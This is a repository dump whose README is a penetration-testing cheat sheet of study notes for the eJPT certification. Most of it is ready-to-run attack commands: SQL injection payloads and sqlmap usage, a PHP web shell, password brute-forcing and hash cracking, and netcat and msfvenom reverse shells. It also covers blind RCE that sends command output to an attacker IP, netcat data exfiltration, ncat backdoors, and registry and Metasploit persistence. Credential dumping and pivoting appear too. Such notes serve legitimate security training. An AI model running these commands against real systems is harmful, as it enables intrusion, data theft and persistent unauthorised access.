├── CNAME
├── ejpt.jpg
├── .github
├── FUNDING.yml
└── auto_assign.yml
└── README.md
/CNAME:
--------------------------------------------------------------------------------
1 | ejpt-notes.com
--------------------------------------------------------------------------------
/ejpt.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/eJPT-notes/HEAD/ejpt.jpg
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: edoardottt
2 | liberapay: edoardottt
3 | patreon: edoardottt
4 | ko_fi: edoardottt
5 | open_collective: edoardottt
6 | custom: "https://www.paypal.me/edoardottt"
7 |
--------------------------------------------------------------------------------
/.github/auto_assign.yml:
--------------------------------------------------------------------------------
1 | # Set to true to add reviewers to pull requests
2 | addReviewers: true
3 |
4 | # A list of reviewers to be added to pull requests (GitHub user name)
5 | reviewers:
6 | - edoardottt
7 |
8 | # A list of keywords to be skipped the process that add reviewers if pull requests include it
9 | skipKeywords:
10 | - wip
11 |
12 | # A number of reviewers added to the pull request
13 | # Set 0 to add all the reviewers (default: 0)
14 | numberOfReviewers: 0
15 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 |
5 | > **Note**
6 | > These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'.
7 |
8 | Notes by [@edoardottt](https://edoardottt.com/), exam passed with 19/20 score.
9 |
10 | Info about eJPT certification [here](https://security.ine.com/certifications/ejpt-certification/).
11 | Read also my [blog post](https://edoardottt.com/ejpt) about eJPT certification.
12 |
13 | #### Exam setup
14 |
15 | - Download OPVN configuration file
16 | - `sudo openvpn file.ovpn`
17 | - Enter username and password
18 | - CTRL+Z
19 | - `bg`
20 |
21 | #### Add a route in IP routes
22 |
23 | Linux:
24 |
25 | ```bash
26 | ip route via
27 | ```
28 |
29 | #### Show IP addresses
30 |
31 | Linux:
32 |
33 | ```bash
34 | ip addr
35 | ```
36 |
37 | #### Show CAM table
38 |
39 | Linux:
40 |
41 | ```bash
42 | ip neighbor
43 | ```
44 |
45 | or
46 |
47 | ```bash
48 | ifconfig
49 | ```
50 |
51 | #### Show Listening ports (both UDP and TCP)
52 |
53 | Linux:
54 |
55 | ```bash
56 | netstat -tunp
57 | ```
58 |
59 | Windows:
60 |
61 | ```bash
62 | netstat -ano
63 | ```
64 |
65 | #### ARP Spoofing
66 |
67 | ```bash
68 | echo 1 > /proc/sys/net/ipv4/ip_forward
69 | ```
70 |
71 | ```bash
72 | arpspoof -i -t -r
73 | ```
74 |
75 | To intercept the traffic between 192.168.4.11 and 192.168.4.16
76 |
77 | ```bash
78 | arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16
79 | ```
80 |
81 | #### Ping sweeping
82 |
83 | ```bash
84 | fping -a -g 192.168.1.0/24 2> /dev/null
85 | ```
86 |
87 | or
88 |
89 | ```bash
90 | fping -a -f targets.txt 2>/dev/null
91 | ```
92 |
93 | or
94 |
95 | ```bash
96 | nmap -sn 192.168.1.0/24
97 | ```
98 |
99 | or
100 |
101 | ```bash
102 | nmap -sn -iL networks.txt
103 | ```
104 |
105 | #### OS Fingerprinting
106 |
107 | ```bash
108 | nmap -Pn -O
109 | ```
110 |
111 | #### Port Scanning
112 |
113 | `nmap`...Then remember:
114 |
115 | - `-sT`: TCP Connect Scan, usually recorded in application logs
116 | - `-sS`: TCP Syn Scan, usually not recorded in app. logs (well configured IDSs do)
117 | - `-sV`: Version Detection Scan, TCP Connect Scan + Banner Detection
118 |
119 | Example:
120 |
121 | ```bash
122 | nmap -sS -p 1-100,443 192.168.1.13,14
123 | ```
124 |
125 | Tip: Use `--reason` to show the explanation of why a port is marked open or closed
126 | Tip: Use `--open` to show only open, open|filtered, and unfiltered ports.
127 |
128 | TCP Quick Scan
129 |
130 | ```bash
131 | nmap -sV -sC 192.168.1.1
132 | ```
133 |
134 | TCP Full Scan
135 |
136 | ```bash
137 | nmap -sV -sC -p- 192.168.1.1
138 | ```
139 |
140 | UDP Quick Scan
141 |
142 | ```bash
143 | nmap -sV -sU 192.168.1.1
144 | ```
145 |
146 | Get info on a particular service
147 |
148 | ```bash
149 | nmap -sC -p 27017 192.168.1.13 | less
150 | ```
151 |
152 | #### Masscan
153 |
154 | Check if masscan is properly installed:
155 |
156 | ```bash
157 | masscan --regress
158 | ```
159 |
160 | Scan example:
161 |
162 | ```bash
163 | masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24
164 | ```
165 |
166 | If you want to use a VPN connection (configure the options properly):
167 |
168 | ```bash
169 | masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1
170 | ```
171 |
172 | In order to save the configuration into a file:
173 |
174 | ```bash
175 | masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo > masscan.conf
176 | ```
177 |
178 | Use the configuration file as input:
179 |
180 | ```bash
181 | masscan -c masscan.conf
182 | ```
183 |
184 | #### Web Fingerprinting
185 |
186 | Using netcat:
187 |
188 | ```bash
189 | nc 192.168.1.2 80
190 | HEAD / HTTP/1.1
191 | ```
192 |
193 | Using openssl:
194 |
195 | ```bash
196 | openssl s_client -connect target.site:443
197 | HEAD / HTTP/1.1
198 | ```
199 |
200 | Using httprint:
201 |
202 | ```bash
203 | httprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt
204 | ```
205 |
206 | #### Directory/Files enumeration with dirb
207 |
208 | Default scan:
209 |
210 | ```bash
211 | dirb http://google.com
212 | ```
213 |
214 | Using a custom wordlist:
215 |
216 | ```bash
217 | dirb http://google.com /usr/share/dirb/wordlists/small.txt
218 | ```
219 |
220 | Using cookies:
221 |
222 | ```bash
223 | dirb http://google.com -c "COOKIE:XYZ"
224 | ```
225 |
226 | Using Basic Authentication:
227 |
228 | ```bash
229 | dirb http://google.com -u "admin:password"
230 | ```
231 |
232 | Using Custom Header:
233 |
234 | ```bash
235 | dirb http://google.com -H "MyHeader: MyContent"
236 | ```
237 |
238 | Disable recursive enumeration:
239 |
240 | ```bash
241 | dirb http://google.com -r
242 | ```
243 |
244 | Set Speed delay in milliseconds:
245 |
246 | ```bash
247 | dirb http://google.com -z 1000
248 | ```
249 |
250 | Specify extensions:
251 |
252 | ```bash
253 | dirb http://google.com -X ".php,.bak"
254 | ```
255 |
256 | Save results in a file:
257 |
258 | ```bash
259 | dirb http://google.com -o results.txt
260 | ```
261 |
262 | #### Google Dorks
263 |
264 | - `site:` Include only results on a given hostname
265 | - `intitle:` Filters according to the title of a page
266 | - `inurl:` Similar to intitle but works on the URL of a resource
267 | - `filetype:` Filters by using the file extension of a resource
268 | - `AND`, `OR`, `|` Use logical operators to combine your expressions
269 | - `-` Filter out a keyword or a command's result
270 |
271 | Example: `-inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf`
272 | See also the [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)
273 |
274 | #### XSS
275 |
276 | Payload: ``
277 | Server:
278 |
279 | ```php
280 |
287 | ```
288 |
289 | #### SQLi
290 |
291 | Payloads:
292 |
293 | - `' OR 'a'='a`
294 | - `' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a`
295 | - `' OR substr(user(),1,1) = 'a`
296 | - `' UNION SELECT user(); -- -`
297 |
298 | Sqlmap:
299 |
300 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --cookie "PHPSESSID=m42ba4etbktcktvjadirnsqqg4;`
301 | - `sqlmap -u 'http://victim.site/view.php?id=1141' -p id --technique=U`
302 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --banner`
303 | - `sqlmap -u 'http://victim.site/view.php?id=1141' -v3 --fresh-queries`
304 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --users`
305 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --dbs`
306 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --tables`
307 | - `sqlmap -u 'http://victim.site/view.php?id=1141' -D -T `
308 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db --columns`
309 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db --dump`
310 | - `sqlmap -u 'http://victim.site/login.php' --data='user=a&pass=a' -p user --technique=B --banner`
311 | - `sqlmap -r post-vuln-sqli.txt -p user --technique=B --banner`
312 |
313 | Tip: Dump only the data you're interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.
314 |
315 | #### Misconfigured PUT method
316 |
317 | ```bash
318 | wc -m payload.php
319 | 20 payload.php
320 | ```
321 |
322 | ```bash
323 | nc victim.site 80
324 | PUT /payload.php HTTP/1.1
325 | Host: victim.site
326 | Content-type: text/html
327 | Content-length: 20
328 |
329 |
330 | ```
331 |
332 | #### Uploading PHP shell
333 |
334 | ```php
335 | ';
340 | $result = shell_exec($cmd);
341 | echo $result;
342 | echo '';
343 | }
344 | ?>
345 | ```
346 |
347 | #### Authentication Cracking with Hydra
348 |
349 | - `hydra -U http-post-form` (get info on a module)
350 | - `hydra -L users.txt -P passwords.txt `
351 | - `hydra crackme.site http-post-form "/login.php:user=^USER^&pwd=^PASS^:invalid credentials" -L users.txt -P passwords.txt -f -V`
352 | - `hydra 192.168.1.2 ssh -L users.txt -P passwords.txt -f -V`
353 |
354 | #### Authentication Cracking with nmap
355 |
356 | - `nmap -p 22 --script ssh-brute --script-args userdb=/root/users.txt demo.ine.local`
357 |
358 | #### Authentication Cracking with metasploit
359 |
360 | - `use auxiliary/scanner/ssh/ssh_login`
361 | - `set RHOSTS demo.ine.local`
362 | - `set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt`
363 | - `set STOP_ON_SUCCESS true`
364 | - `set verbose true`
365 | - `exploit`
366 |
367 | #### Password cracking using John the Ripper
368 |
369 | - `unshadow /etc/passwd /etc/shadow > crackme.txt`
370 | - `john --incremental -users: crackme.txt` (bruteforce, don't use it!)
371 | - `john --show crackme.txt`
372 | - `john --wordlist= crackme.txt`
373 | - `john --wordlist= --rules crackme.txt` (enable word mangling)
374 |
375 | #### Cracking Password of Microsoft Word file using John the Ripper
376 |
377 | - `/usr/share/john/office2john.py MS_Word_Document.docx > hash`
378 | - `john --wordlist=passwds.txt hash`
379 |
380 | #### Password cracking using Hashcat
381 |
382 | - `hashcat -m 0 -a 0 -D2 example0.hash example.dict` (m = 0 is MD5)
383 | - `hashcat -m 0 -a 0 -D2 example0.hash example.dict -r custom.rule`
384 |
385 | #### Windows Shares
386 |
387 | Interesting shares:
388 |
389 | - `\\ComputerName\C$` lets an administrator access a volume (C$, D$, E$...)
390 | - `\\ComputerName\admin$` points to the Windows installation directory
391 |
392 | Enumerating shares (Windows):
393 |
394 | - `nbtstat -A 192.168.1.11`
395 | - `net view 192.168.1.11`
396 | - `net use \\192.168.1.11\IPC$ '' /u:''` (null session attack)
397 | - `enum -S 192.168.1.11` ([enum](https://packetstormsecurity.com/search/?q=win32+enum&s=files))
398 | - `enum -U 192.168.1.11`
399 | - `enum -P 192.168.1.11`
400 |
401 | Enumerating shares (Linux):
402 |
403 | - `nmblookup -A 192.168.1.11`
404 | - `smbclient -L //192.168.1.11 -N`
405 | - `smbclient //192.168.1.11/IPC$ -N` (null session attack)
406 | - `enum4linux -n 192.168.1.11`
407 | - `enum4linux -P 192.168.1.11`
408 | - `enum4linux -S 192.168.1.11`
409 | - `enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.1.11`
410 | - `enum4linux -a 192.168.1.11`
411 | - `smbmap -H demo.ine.local`
412 | - `nmap -sU -sV -p137,138 demo.ine.local`
413 | - `nmap -script=smb-enum-shares -Pn 192.168.1.11`
414 | - `nmap -script=smb-enum-users -Pn 192.168.1.11`
415 | - `nmap -script=smb-brute -Pn 192.168.1.11`
416 | - `nmap --script smb-vuln-* -Pn 192.168.1.11`
417 | - `python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.1.11`
418 |
419 | #### Metasploit
420 |
421 | ```bash
422 | msfconsole
423 | ```
424 |
425 | ```bash
426 | show -h
427 | ```
428 |
429 | ```bash
430 | search
431 | ```
432 |
433 | ```bash
434 | use
435 | ```
436 |
437 | ```bash
438 | show options
439 | ```
440 |
441 | ```bash
442 | set
443 | ```
444 |
445 | ```bash
446 | exploit
447 | ```
448 |
449 | Tip: Use `show payloads` when an exploit is selected to show only the available payloads for that exploit
450 | Tip: Use `info` when an exploit is selected to get information about the exploit
451 | Tip: Use `back` when an exploit is selected to return to unselect it
452 |
453 | #### Meterpreter
454 |
455 | Inside metasploit:
456 |
457 | - `search meterpreter`
458 | - `set payload `
459 | - `background`
460 | - `sessions -l` (list the sessions)
461 | - `sessions -i ` (resume a background session)
462 | - `sysinfo`
463 | - `ifconfig`
464 | - `route`
465 | - `getuid`
466 | - `getsystem`
467 | - You can use Unix-like commands like `pwd`, `ls`, `cd`...
468 | - `download `
469 | - `upload `
470 | - `shell`
471 | - `hashdump`
472 | - `run autoroute -h`
473 | - `run autoroute -s 192.130.110.0 -n 255.255.255.0` (pivoting towards that network)
474 |
475 | Tip: `help` shows an amazing list of available commands divided by category
476 | Tip: If `getsystem` fails, use `use exploit/windows/local/bypassuac`
477 | Tip: `ps -U SYSTEM` shows only the processes with SYSTEM privileges
478 | Tip: Use `post/windows/gather/hashdump` to dump the passwords DB and save it for an offline cracking session
479 |
480 | #### Pivoting with Meterpreter
481 |
482 | Let's say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it's reachable only from the compromised machine.
483 | Our IP: `192.180.40.2`
484 | Compromised host: `192.180.40.3`
485 | Unreachable machine: `192.130.110.3`
486 |
487 | - `meterpreter > run autoroute -s 192.130.110.0 -n 255.255.255.0 1`
488 | - `background`
489 | - `msf > route`
490 |
491 | If we want to scan the `192.130.110.0/24` network we can use:
492 |
493 | ```bash
494 | msf > use auxiliary/scanner/portscan/tcp
495 | msf > set PORTS 80, 8080, 445, 21, 22, ...
496 | msf > set RHOSTS 192.130.110.1-254
497 | msf > exploit
498 | ```
499 |
500 | If we discover that at least one port is open and we want to target a specific port on a specific host (e.g. `192.130.110.3:21`) we can use:
501 |
502 | - `sessions 1` (back to meterpreter session)
503 | - `portfwd add -l 1234 -p 21 -r 192.130.110.3` (forwarding remote machine port 21 to the local machine port 1234)
504 | - `portfwd list`
505 | - `background`
506 |
507 | Then if we want to scan the service we can use nmap:
508 |
509 | ```bash
510 | msf > nmap -sS -sV -p 1234 localhost
511 | ```
512 |
513 | #### Reverse shell with Netcat
514 |
515 | Attacker:
516 |
517 | ```bash
518 | nc -lvp 8888 -e /bin/bash
519 | ```
520 |
521 | Target (the IP of the attacker):
522 |
523 | ```bash
524 | nc -v 192.168.1.1 8888
525 | ```
526 |
527 | #### Generate a reverse shell payload with msfvenom
528 |
529 | ```bash
530 | msfvenom --list payloads | grep
531 | ```
532 |
533 | ```bash
534 | msfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php
535 | ```
536 |
537 | ```bash
538 | msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443
539 | chmod +x reverse443
540 | ```
541 |
542 | Note: If you have generated a meterpreter payload shell, you have to use meterpreter in order to receive back the connection
543 |
544 | #### Blind Remote Code Execution
545 |
546 | Target (Use the Attacker IP)
547 |
548 | ```bash
549 | curl http://192.168.1.130:53/`whoami`
550 | ```
551 |
552 | or
553 |
554 | ```bash
555 | curl http://192.168.1.130:53/`id | base64`
556 | ```
557 |
558 | Attacker:
559 |
560 | ```bash
561 | nc -lvp 53
562 | ```
563 |
564 | Tip: You can also create a reverse shell with `msfvenom` and let the target download it
565 |
566 | #### Enumerating users history with meterpreter
567 |
568 | - `background`
569 | - `use post/linux/gather/enum_users_history`
570 | - `set SESSION 1`
571 | - `exploit`
572 |
573 | #### Data exfiltration with Netcat
574 |
575 | Receiver:
576 |
577 | ```bash
578 | nc -lvnp 8888 > received.txt
579 | ```
580 |
581 | Sender (the IP of the receiver):
582 |
583 | ```bash
584 | cat message.txt | nc -v 192.168.1.1 8888
585 | ```
586 |
587 | #### Backdoor using ncat
588 |
589 | Victim:
590 |
591 | ```bash
592 | ncat -l -p 5555 -e cmd.exe
593 | ```
594 |
595 | Attacker (the IP of the victim):
596 |
597 | ```bash
598 | ncat 192.168.1.66 5555
599 | ```
600 |
601 | #### Reverse Backdoor using ncat
602 |
603 | Attacker:
604 |
605 | ```bash
606 | ncat -l -p 5555 -v
607 | ```
608 |
609 | Victim (the IP of the attacker):
610 |
611 | ```bash
612 | ncat -e cmd.exe 192.168.1.66 5555
613 | ```
614 |
615 | Tip: For persistent reverse backdoor use the registry key `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
616 |
617 | #### Reverse Backdoor using Metasploit
618 |
619 | ```bash
620 | msfconsole
621 | use exploit/windows/local/s4u_persistence
622 | show options
623 | sessions
624 | set session
625 | set trigger logon
626 | set payload windows/meterpreter/reverse_tcp
627 | set lhost
628 | set lport 1234
629 | exploit
630 | use exploit/multi/handler
631 | set payload windows/meterpreter/reverse_tcp
632 | show options
633 | set lhost
634 | set lport 1234
635 | exploit
636 | sysinfo
637 | ps
638 | help
639 | ```
640 |
641 | Tip: once we get a shell we can use `screenshot` to get a picture of what the victim is seeing on the Desktop
642 | Tip: once we get a shell we can use `download filename location` to save the filename in the specified location on our machine
643 | Tip: Same syntax as above but use `upload` to upload files
644 | Tip: Use `getsystem` to gain the highest privilege (i.e. SYSTEM) on the compromised machine and `getuid` to check if it actually worked.
645 |
646 | #### Upgrading a simple shell
647 |
648 | ```bash
649 | bash -i
650 | ```
651 |
652 | ```bash
653 | python -c 'import pty; pty.spawn("/bin/sh")'
654 | ```
655 |
656 | #### Maintaining access using Metasploit (Windows)
657 |
658 | Inside a meterpreter session:
659 |
660 | - `background`
661 | - `use exploit/windows/local/persistence_service`
662 | - `show options`
663 | - `set SESSION `
664 | - `exploit`
665 |
666 | Use the backdoor:
667 |
668 | - `background`
669 | - `sessions -K`
670 | - `use exploit/multi/handler`
671 | - `set PAYLOAD windows/meterpreter/reverse_tcp`
672 | - `set LHOST `
673 | - `set LPORT 4444`
674 | - `exploit`
675 |
676 | Note: The `` is the one you can read when you type `background`
677 | Note: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can't change Payload, IP or Ports details.
678 |
679 | #### Pivoting using a SOCKS Proxy
680 |
681 | You have access to a compromised host and only from there you can access another machine. That machine exposes a web server, in order to access it from your computer set up a SOCKS proxy.
682 |
683 | Add the route to the unreachable network using autoroute or route.
684 |
685 | ```bash
686 | msf > use auxiliary/server/socks_proxy
687 | msf > set VERSION 4a
688 | msf > set SRVPORT 9050
689 | msf > run -j
690 | ```
691 |
692 | ```bash
693 | root@INE:~# proxychains nmap ...
694 | ```
695 |
696 | Then you can also setup firefox in order to send request using the SOCKS proxy v4 at `127.0.0.1:9050`.
697 |
698 | #### Dump AutoLogin stored credentials
699 |
700 | Inside a meterpreter session:
701 |
702 | - `migrate -N explorer.exe`
703 | - `background`
704 | - `use post/windows/gather/credentials/windows_autologin`
705 | - `set SESSION `
706 | - `exploit`
707 |
708 | ----------
709 |
710 | If you find an error or want to improve this page, just [open an issue](https://github.com/edoardottt/eJPT-notes/issues).
711 |
712 | **Don't** text/mail me looking for exam solutions.
713 |
--------------------------------------------------------------------------------